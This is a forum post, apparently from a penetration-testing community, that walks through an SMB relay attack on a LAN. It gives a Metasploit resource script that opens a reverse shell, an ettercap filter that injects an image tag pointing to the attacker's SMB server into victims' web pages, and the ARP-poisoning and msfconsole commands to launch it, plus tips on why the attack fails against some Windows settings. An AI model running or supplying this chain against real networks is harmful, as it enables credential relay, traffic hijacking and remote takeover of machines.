update 7:27 PM 2/4/2009: http://www.tarasco.org/security/smbrelay/index.html




videos:

# with ettercap
http://s5.video.blip.tv/170000300628...console219.flv

# Thursday, 20 September 2007 ( not with ettercap )
http://www.learnsecurityonline.com/v...ay-reverse.swf




4:42 PM 4/25/2008:
"" I tried it with "Use simple file sharing" (recommended) checked...and the exploit WOULD NOT WORK. ""

sadly (sometimes !?!?!?) this is checked by default so I will look into some other things ...
you also want to check out the fastrack mass client side has GDI and QT exploits all in one etc ! ( this is part of the fast-track.py you must update it to current )


Firefox be design will not load a 'local share' this including \\SMB\image.jpg shares
( if anybody has a non javascript workaround please let me know FLASH also has the same security or just gets passed to firefox and then borks )

May be possible to use this trick 301 redirect the user to a local\share
http://forums.remote-exploit.org/showthread.php?p=94904



What you need:
* ettercap
* ms framework3
* victim must have admin privs with no blank password and load an HTTP or HTTPS webpage.
* only works for MIM ( LAN etc .. )

** based on HD moore's presentation at Defcon that used WPAD http://video.google.co.uk/videoplay?...56903673801959 'Tactical Exploitation'

change the IP to your IP


smb.rc
Code:
use exploit/windows/smb/smb_relay
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.90
set LPORT 21
exploit

smb.filter
Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("</body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>" ");
   replace("</Body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>" ");
   msg("Filter Ran.\n");
}
# etterfilter makes the smb.ef to use with ettercap

etterfilter smb.filter -o smb.ef
# run ettercap on target
ettercap -T -q -F smb.ef -M ARP // // -P autoadd

# start up msfconsole with the RC script
/pentest/exploits/framework3/msfconsole -r smb.rc


what happends ??

ettercap replaces IMG with \\yourip so then the victim trys to access your SMB_RELAY server for the IMG
then attacker say NO access denied ! victim says OK let me try my login by default


""Great job, but I got the well-known error message, which starts so:
"FAILED! The remote host has only provided us with Guest privileges...."""

read the error before that error the guest error just means the auth failed




Quote Originally Posted by www
5. On a Windows XP Pro computer, make sure that remote logons are not being coerced to the GUEST account (aka "ForceGuest", which is enabled by default computers that are not attached to a domain). To do this, open the Local Security Policy editor (e.g. by typing 'secpol.msc' into the Run box, without quotes). Expand the "Local Policies" node and select "Security Options". Now scroll down to the setting titled "Network access: Sharing and security model for local accounts". If this is set to "Guest only", change it to "Classic" and restart your computer.